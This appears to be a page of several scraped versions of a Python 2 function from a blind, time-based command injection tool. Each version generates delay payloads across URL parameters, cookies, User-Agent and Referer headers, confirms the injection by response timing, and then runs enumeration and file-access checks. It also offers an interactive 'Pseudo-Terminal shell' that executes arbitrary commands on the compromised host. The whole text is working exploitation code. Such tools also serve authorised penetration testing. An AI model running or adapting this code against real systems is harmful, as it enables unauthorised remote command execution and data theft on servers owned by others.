  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))

  percent = str(percent)+"%"
  sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
  sys.stdout.flush()

  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
        num_of_chars = num_of_chars + 1
        
        # Check for bad combination of prefix and separator
        combination = prefix + separator
        if combination in settings.JUNK_COMBINATION:
          prefix = ""
        
        # Define alter shell
        alter_shell = menu.options.alter_shell
        
        # Change TAG on every request to prevent false-positive results.
        TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
        tag_length = len(TAG) + 4
        
        for output_length in range(1, int(tag_length)):
          try:
            
            if alter_shell:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision_alter_shell(separator, TAG, output_length, delay, http_request_method)
            else:
              # Time-based decision payload (check if host is vulnerable).
              payload = tb_payloads.decision(separator, TAG, output_length, delay, http_request_method)

            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)
              
            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              how_long = tb_injector.cookie_injection_test(url, vuln_parameter, payload)

            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              how_long = tb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              how_long = tb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              how_long, vuln_parameter = tb_injector.injection_test(payload, http_request_method, url)

            # Injection percentage calculation
            percent = ((num_of_chars * 100) / total)

            if percent == 100 and no_result == True:
              if not menu.options.verbose:
                percent = Fore.RED + "FAILED" + Style.RESET_ALL
              else:
                percent = ""
                
            else:
              if (url_time_response <= 1 and how_long >= delay) or \
              (url_time_response >= 2 and how_long > delay):

                # Time relative false positive fixation.
                randv1 = random.randrange(0, 1)
                randv2 = random.randrange(1, 2)
                randvcalc = randv1 + randv2
                cmd = "(" + str(randv1) + "+" + str(randv2) + ")"
                
                # Check for false positive resutls
                output = tb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell)
                if str(output) == str(randvcalc) and len(TAG) == output_length:
                  if not menu.options.verbose:
                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                  else:
                    percent = ""
                else:
                  break
                  
              else:
                percent = str(percent)+"%"
                
            if not menu.options.verbose:
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()

          except KeyboardInterrupt: 
            raise
        
          except:
            break
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if (url_time_response <= 1 and how_long >= delay) or \
          (url_time_response >= 2 and how_long > delay):

            if len(TAG) == output_length :
              found = True
              no_result = False

              if settings.COOKIE_INJECTION == True: 
                header_name = " Cookie"
                found_vuln_parameter = vuln_parameter
                the_type = " HTTP header"

              elif settings.USER_AGENT_INJECTION == True: 
                header_name = " User-Agent"
                found_vuln_parameter = ""
                the_type = " HTTP header"

              elif settings.REFERER_INJECTION == True: 
                header_name = " Referer"
                found_vuln_parameter = ""
                the_type = " HTTP header"
                
              else:
                header_name = ""
                the_type = " parameter"
                if http_request_method == "GET":
                  found_vuln_parameter = parameters.vuln_GET_param(url)
                else :
                  found_vuln_parameter = vuln_parameter

              if len(found_vuln_parameter) != 0 :
                found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 
              
              # Print the findings to log file.
              if export_injection_info == False:
                export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
              if vp_flag == True:
                vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
              logs.upload_payload(filename, counter, payload) 
              counter = counter + 1
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL

              # Check for any enumeration options.
              tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

              # Check for any system file access options.
              tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
              
              # Check if defined single cmd.
              if menu.options.os_cmd:
                tb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

              # Pseudo-Terminal shell
              go_back = False
              while True:
                if go_back == True:
                  break
                gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
                if gotshell in settings.CHOISE_YES:
                  print ""
                  print "Pseudo-Terminal (type '?' for shell options)"
                  while True:
                    try:
                      cmd = raw_input("Shell > ")
                      if cmd.lower() in settings.SHELL_OPTIONS:
                        if cmd == "?":
                          menu.shell_options()
                          continue
                        elif cmd.lower() == "quit":
                          logs.logs_notification(filename)
                          sys.exit(0)
                        elif cmd.lower() == "back":
                          go_back = True
                          break
                        else:
                          pass
                        
                      else:
                        # The main command injection exploitation.
                        check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)

                      if menu.options.verbose:
                        print ""

                      if output != "" and check_how_long != 0 :
                        print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
                        print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
                      else:
                        # Check if exists pipe filtration.
                        if output != False :
                           print "\n" + Fore.YELLOW  + "(^) Warning: It appears that '" + cmd + "' command could not return any output" + (', due to pipe (|) filtration.', '.')[separator == "||"]  + Style.RESET_ALL
                           print Fore.YELLOW  + "             "+ ('To bypass that limitation, u', 'U')[separator == "||"]  +"se '--alter-shell' or try another injection technique (i.e. '--technique=\"f\"')" + Style.RESET_ALL 
                           sys.exit(1)
                        # Check for fault command.
                        else:
                           print Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"

                    except KeyboardInterrupt: 
                      raise
                  
                elif gotshell in settings.CHOISE_NO:
                  if menu.options.verbose:
                    sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                    sys.stdout.flush()
                  break

                else:
                  if gotshell == "":
                    gotshell = "enter"
                  print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                  pass
            
            break
          
  if no_result == True:
    print ""
    return False

  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Esempio n. 6
0
def tb_injection_handler(url,delay,filename,http_request_method):

  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  export_injection_info = False
  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"
      
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print colors.BGRED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET
  i = 0
  # Calculate all possible combinations
  total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
  
  # Estimating the response time (in seconds)
  # opener = urllib.FancyURLopener({})
  request = urllib2.Request(url)
  headers.do_check(request)
  start = time.time()
  #f = opener.open(url)
  response = urllib2.urlopen(request)
  response.read(1)
  response.close()
  end = time.time()
  diff = end - start
  url_time_response = int(diff)
  if url_time_response != 0 :
    print colors.BOLD + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[url_time_response == 1:] + "." + colors.RESET
  delay = int(delay) + int(url_time_response)
  
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:
	i = i + 1
	
	# Check for bad combination of prefix and separator
	combination = prefix + separator
	if combination in settings.JUNK_COMBINATION:
	  prefix = ""
	
	# Define alter shell
	alter_shell = menu.options.alter_shell
	
	# Change TAG on every request to prevent false-positive resutls.
	TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
	tag_length = len(TAG) + 4
	
	for j in range(1,int(tag_length)):
	  try:
	    
	    if alter_shell:
	      # Time-based decision payload (check if host is vulnerable).
	      payload = tb_payloads.decision_alter_shell(separator,TAG,j,delay,http_request_method)
	    else:
	      # Time-based decision payload (check if host is vulnerable).
	      payload = tb_payloads.decision(separator,TAG,j,delay,http_request_method)

	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	    else:
	      payload = prefix + payload

	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	    else:
	      payload = payload + suffix
	      
	    # Check if defined "--verbose" option.
	    if menu.options.verbose:
	      sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
		
	    # Check if target host is vulnerable.
	    how_long,vuln_parameter = tb_injector.injection_test(payload,http_request_method,url)
	    if not menu.options.verbose:
	      percent = ((i*100)/total)
	      if how_long >= delay:
		percent = colors.GREEN + "SUCCEED" + colors.RESET
	      elif percent == 100:
		if no_result == True:
		  percent = colors.RED + "FAILED" + colors.RESET
		else:
		    percent = str(percent)+"%"
	      else:
		percent = str(percent)+"%"
	      sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
	      sys.stdout.flush()
	      
	  except KeyboardInterrupt: 
	    raise
	
	  except:
	    break
	  
	  # Yaw, got shellz! 
	  # Do some magic tricks!
	  if how_long >= delay :
	    found = True
	    no_result = False
	    
	    # Print the findings to log file.
	    if export_injection_info == False:
	      output_file = open(filename + ".txt", "a")
	      output_file.write("\n(+) Type : " + injection_type)
	      output_file.write("\n(+) Technique : " + technique.title())
	      output_file.close()
	      export_injection_info = True
  
	    if http_request_method == "GET":
	      # Print the findings to log file
	      if vp_flag == True:
		output_file = open(filename + ".txt", "a")
		output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
		output_file.write("\n")
		vp_flag = False
		output_file.close()
		
	      counter = counter + 1
	      output_file = open(filename + ".txt", "a")
	      output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
	      output_file.close()

	      #Vulnerabe Parameter
	      GET_vuln_param = parameters.vuln_GET_param(url)
	      
	      # Print the findings to terminal.
	      print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + colors.UNDERL + GET_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
	      print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
	      print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
	      print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n","\\n"))) + colors.RESET
		
	    else :
	      # Print the findings to log file
	      if vp_flag == True:
		output_file = open(filename + ".txt", "a")
		output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
		output_file.write("\n")
		vp_flag = False
		output_file.close()
		
	      counter = counter + 1
	      output_file = open(filename + ".txt", "a")
	      output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
	      output_file.close()

	      #Vulnerabe Parameter
	      POST_vuln_param = vuln_parameter
	      
	      # Print the findings to terminal.
	      print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + colors.UNDERL + POST_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
	      print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
	      print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
	      print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20", " ", payload.replace("\n","\\n")) + colors.RESET
	      
	    # Check for any enumeration options.
	    tb_enumeration.do_check(separator,maxlen,TAG,prefix,suffix,delay,http_request_method,url,vuln_parameter,alter_shell)

	    # Check for any system file access options.
	    tb_file_access.do_check(separator,maxlen,TAG,prefix,suffix,delay,http_request_method,url,vuln_parameter,alter_shell)
	    
	    # Pseudo-Terminal shell
	    while True:
	      gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
	      if gotshell in settings.CHOISE_YES:
		print ""
		print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
		while True:
		  try:
		    cmd = raw_input("Shell > ")
		    if cmd == "q":
		      sys.exit(0)
		      
		    else:
		      # The main command injection exploitation.
		      check_how_long,output  = tb_injector.injection(separator,maxlen,TAG,cmd,prefix,suffix,delay,http_request_method,url,vuln_parameter,alter_shell)
		      
		      if menu.options.verbose:
			print ""
		      print "\n\n" + colors.GREEN + colors.BOLD + output + colors.RESET
		      print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
		      
		  except KeyboardInterrupt: 
		    print ""
		    sys.exit(0)
		
	      elif gotshell in settings.CHOISE_NO:
		break
		if menu.options.verbose:
		  sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
		  sys.stdout.flush()
	      
	      else:
		if gotshell == "":
		  gotshell = "enter"
		print colors.BGRED + "(x) Error: '" + gotshell + "' is not a valid answer." + colors.RESET
		pass
	      
	    break
	  
  if no_result == True:
    if menu.options.verbose == False:
      print ""
      return False
    else:
      print ""
      return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Esempio n. 7
0
def tb_injection_handler(url, delay, filename, http_request_method):

    counter = 0
    vp_flag = True
    no_result = True
    is_encoded = False
    injection_type = "Blind-based Command Injection"
    technique = "time-based injection technique"

    # Print the findings to log file.
    output_file = open(filename + ".txt", "a")
    output_file.write("\n---")
    output_file.write("\n(+) Type : " + injection_type)
    output_file.write("\n(+) Technique : " + technique.title())
    output_file.close()

    # Check if defined "--maxlen" option.
    if menu.options.maxlen:
        maxlen = menu.options.maxlen

    # Check if defined "--url-reload" option.
    if menu.options.url_reload == True:
        print colors.BGRED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + colors.RESET
    i = 0
    # Calculate all possible combinations
    total = (len(settings.PREFIXES) * len(settings.SEPARATORS) *
             len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))

    #Estimating the response time (in seconds)
    sys.stdout.write("(*) The estimated response time is ")
    sys.stdout.flush()
    opener = urllib.FancyURLopener({})
    start = time.time()
    f = opener.open(url)
    end = time.time()
    diff = end - start
    url_time_response = int(diff)
    print str(url_time_response) + " second" + "s"[url_time_response ==
                                                   1:] + "."
    delay = int(delay) + int(url_time_response)

    for prefix in settings.PREFIXES:
        for suffix in settings.SUFFIXES:
            for separator in settings.SEPARATORS:
                i = i + 1

                # Check for bad combination of prefix and separator
                combination = prefix + separator
                if combination in settings.JUNK_COMBINATION:
                    prefix = ""

                # Change TAG on every request to prevent false-positive resutls.
                TAG = ''.join(
                    random.choice(string.ascii_uppercase) for i in range(6))
                tag_length = len(TAG) + 4

                for j in range(1, int(tag_length)):
                    try:
                        # Time-based decision payload (check if host is vulnerable).
                        payload = tb_payloads.decision(separator, TAG, j,
                                                       delay,
                                                       http_request_method)

                        # Check if defined "--prefix" option.
                        if menu.options.prefix:
                            prefix = menu.options.prefix
                            payload = prefix + payload
                        else:
                            payload = prefix + payload

                        # Check if defined "--suffix" option.
                        if menu.options.suffix:
                            suffix = menu.options.suffix
                            payload = payload + suffix
                        else:
                            payload = payload + suffix

                        # Check if defined "--verbose" option.
                        if menu.options.verbose:
                            if separator == ";" or separator == "&&" or separator == "||":
                                sys.stdout.write("\n" + colors.GREY + payload +
                                                 colors.RESET)

                        # Check if target host is vulnerable.
                        how_long, vuln_parameter = tb_injector.injection_test(
                            payload, http_request_method, url)
                        if not menu.options.verbose:
                            percent = ((i * 100) / total)
                            if how_long == delay:
                                percent = colors.GREEN + "SUCCEED" + colors.RESET
                            elif percent == 100:
                                if no_result == True:
                                    percent = colors.RED + "FAILED" + colors.RESET
                                else:
                                    percent = str(percent) + "%"
                            else:
                                percent = str(percent) + "%"
                            sys.stdout.write(colors.BOLD +
                                             "\r(*) Testing the " + technique +
                                             "... " + colors.RESET + "[ " +
                                             percent + " ]")
                            sys.stdout.flush()

                    except KeyboardInterrupt:
                        raise

                    except:
                        continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if how_long == delay:
                        found = True
                        no_result = False

                        if http_request_method == "GET":
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n---\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            #Vulnerabe Parameter
                            GET_vuln_param = parameters.vuln_GET_param(url)

                            # Print the findings to terminal.
                            print colors.BOLD + "\n(!) The (" + http_request_method + ") '" + colors.UNDERL + GET_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to " + injection_type + "." + colors.RESET
                            print "  (+) Type : " + colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
                            print "  (+) Technique : " + colors.YELLOW + colors.BOLD + technique.title(
                            ) + colors.RESET + ""
                            print "  (+) Payload : " + colors.YELLOW + colors.BOLD + re.sub(
                                "%20", " ",
                                urllib.unquote_plus(payload)) + colors.RESET

                        else:
                            # Print the findings to log file
                            if vp_flag == True:
                                output_file = open(filename + ".txt", "a")
                                output_file.write("\n(+) Parameter : " +
                                                  vuln_parameter + " (" +
                                                  http_request_method + ")")
                                output_file.write("\n---\n")
                                vp_flag = False
                                output_file.close()

                            counter = counter + 1
                            output_file = open(filename + ".txt", "a")
                            output_file.write("  (" + str(counter) +
                                              ") Payload : " +
                                              re.sub("%20", " ", payload) +
                                              "\n")
                            output_file.close()

                            #Vulnerabe Parameter
                            POST_vuln_param = vuln_parameter

                            # Print the findings to terminal.
                            print colors.BOLD + "\n(!) The (" + http_request_method + ") '" + colors.UNDERL + POST_vuln_param + colors.RESET + colors.BOLD + "' parameter is vulnerable to " + injection_type + "." + colors.RESET
                            print "  (+) Type : " + colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
                            print "  (+) Technique : " + colors.YELLOW + colors.BOLD + technique.title(
                            ) + colors.RESET + ""
                            print "  (+) Payload : " + colors.YELLOW + colors.BOLD + re.sub(
                                "%20", " ", payload) + colors.RESET

                        # Check for any enumeration options.
                        tb_enumeration.do_check(separator, maxlen, TAG, prefix,
                                                suffix, delay,
                                                http_request_method, url,
                                                vuln_parameter)

                        # Pseudo-Terminal shell
                        gotshell = raw_input(
                            "\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > "
                        ).lower()
                        if gotshell in settings.CHOISE_YES:
                            print ""
                            print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                            while True:
                                try:
                                    cmd = raw_input("Shell > ")
                                    if cmd == "q":
                                        sys.exit(0)

                                    else:
                                        # The main command injection exploitation.
                                        check_how_long, output = tb_injector.injection(
                                            separator, maxlen, TAG, cmd,
                                            prefix, suffix, delay,
                                            http_request_method, url,
                                            vuln_parameter)

                                        if menu.options.verbose:
                                            print ""
                                        print "\n\n" + colors.GREEN + colors.BOLD + output + colors.RESET
                                        print "\n(*) Finished in " + time.strftime(
                                            '%H:%M:%S',
                                            time.gmtime(
                                                check_how_long)) + ".\n"

                                except KeyboardInterrupt:
                                    print ""
                                    sys.exit(0)

                        else:
                            if menu.options.verbose:
                                sys.stdout.write(
                                    "\r(*) Continue testing the " + technique +
                                    "... ")
                                sys.stdout.flush()
                            pass

    if no_result == True:
        if menu.options.verbose == False:
            print ""
            return False

        else:
            print ""
            return False

    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Esempio n. 8
0
def tb_injection_handler(url,delay,filename,http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Blind-based Command Injection"
  technique = "time-based injection technique"
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
    
  # Check if defined "--maxlen" option.
  if menu.options.maxlen:
    maxlen = menu.options.maxlen
    
  # Check if defined "--url-reload" option.
  if menu.options.url_reload == True:
    print colors.BGRED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + colors.RESET

  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  for prefix in settings.PREFIXES:
    for suffix in settings.SUFFIXES:
      for separator in settings.SEPARATORS:

	# Check for bad combination of prefix and separator
	combination = prefix + separator
	if combination in settings.JUNK_COMBINATION:
	  prefix = ""
	
	# Change TAG on every request to prevent false-positive resutls.
	TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
	tag_length = len(TAG) + 4
	
	for j in range(1,int(tag_length)):
	  try:
	    # Time-based decision payload (check if host is vulnerable).
	    payload = tb_payloads.decision(separator,TAG,j,delay,http_request_method)
	    
	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	    else:
	      payload = prefix + payload

	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	    else:
	      payload = payload + suffix
	      
	    # Check if defined "--verbose" option.
	    if menu.options.verbose:
	      if separator == ";" or separator == "&&" or separator == "||":
		sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
		
	    # Check if target host is vulnerable.
	    how_long,vuln_parameter = tb_injector.injection_test(payload,http_request_method,url)

	  except:
	    continue
	  
	  # Yaw, got shellz! 
	  # Do some magic tricks!
	  if how_long == delay:
	    found = True
	    no_result = False
	    
	    if http_request_method == "GET":
	      # Print the findings to log file
	      if vp_flag == True:
		output_file = open(filename + ".txt", "a")
		output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
		output_file.write("\n---\n")
		vp_flag = False
		output_file.close()
		
	      counter = counter + 1
	      output_file = open(filename + ".txt", "a")
	      output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
	      output_file.close()
		
	      # Print the findings to terminal.
	      print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
	      print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
	      print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
	      print "  (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
	      print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20", " ", urllib.unquote_plus(payload)) + colors.RESET
		
	    else :
	      # Print the findings to log file
	      if vp_flag == True:
		output_file = open(filename + ".txt", "a")
		output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
		output_file.write("\n---\n")
		vp_flag = False
		output_file.close()
		
	      counter = counter + 1
	      output_file = open(filename + ".txt", "a")
	      output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
	      output_file.close()
		
	      # Print the findings to terminal.
	      print colors.BOLD + "\n(!) The ("+ http_request_method + ") '" + vuln_parameter +"' parameter is vulnerable to "+ injection_type +"."+ colors.RESET
	      print "  (+) Type : "+ colors.YELLOW + colors.BOLD + injection_type + colors.RESET + ""
	      print "  (+) Technique : "+ colors.YELLOW + colors.BOLD + technique.title() + colors.RESET + ""
	      print "  (+) Parameter : "+ colors.YELLOW + colors.BOLD + vuln_parameter + colors.RESET + ""
	      print "  (+) Payload : "+ colors.YELLOW + colors.BOLD + re.sub("%20", " ", payload) + colors.RESET + "\n"
	      
	    # Check for any enumeration options.
	    tb_enumeration.do_check(separator,maxlen,TAG,prefix,suffix,delay,http_request_method,url,vuln_parameter)
	    
	    # Pseudo-Terminal shell
	    gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
	    if gotshell in settings.CHOISE_YES:
	      print ""
	      print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
	      while True:
		try:
		  cmd = raw_input("Shell > ")
		  if cmd == "q":
		    sys.exit(0)
		    
		  else:
		    # The main command injection exploitation.
		    check_how_long,output  = tb_injector.injection(separator,maxlen,TAG,cmd,prefix,suffix,delay,http_request_method,url,vuln_parameter)
		    
		    if menu.options.verbose:
		      print ""
		    print "\n\n" + colors.GREEN + colors.BOLD + output + colors.RESET
		    print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
		    
		except KeyboardInterrupt: 
		  print ""
		  sys.exit(0)

	    else:
	      print "(*) Continue testing the "+ technique +"... "
	      break
	  
  if no_result == True:
    if menu.options.verbose == False:
      print "[" + colors.RED + " FAILED "+colors.RESET+"]"
      return False
  
    else:
      print ""
      return False
  
  else :
    print ""